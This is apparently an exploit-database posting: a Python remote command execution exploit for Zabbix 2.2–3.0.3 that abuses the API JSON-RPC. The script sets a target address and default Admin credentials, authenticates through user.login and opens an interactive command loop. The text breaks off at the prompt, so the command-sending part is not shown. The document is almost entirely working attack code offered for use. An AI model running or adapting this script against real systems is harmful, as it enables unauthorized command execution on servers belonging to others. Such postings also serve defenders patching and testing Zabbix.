Zabbix 3.0.3 Remote Command Execution
Posted on 14 June 2016
#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: Zabbix RCE with API JSON-RPC # Date: 06-06-2016 # Exploit Author: Alexander Gurin # Vendor Homepage: http://www.zabbix.com # Software Link: http://www.zabbix.com/download.php # Version: 2.2 - 3.0.3 # Tested on: Linux (Debian, CentOS) # CVE : N/A import requests import json import readline ZABIX_ROOT = 'http://192.168.66.2' ### Zabbix IP-address url = ZABIX_ROOT + '/api_jsonrpc.php' ### Don't edit login = 'Admin' ### Zabbix login password = 'zabbix' ### Zabbix password hostid = '10084' ### Zabbix hostid ### auth payload = { "jsonrpc" : "2.0", "method" : "user.login", "params": { 'user': ""+login+"", 'password': ""+password+"", }, "auth" : None, "id" : 0, } headers = { 'content-type': 'application/json', } auth = requests.post(url, data=json.dumps(payload), headers=(headers)) auth = auth.json() while True: cmd = raw_input('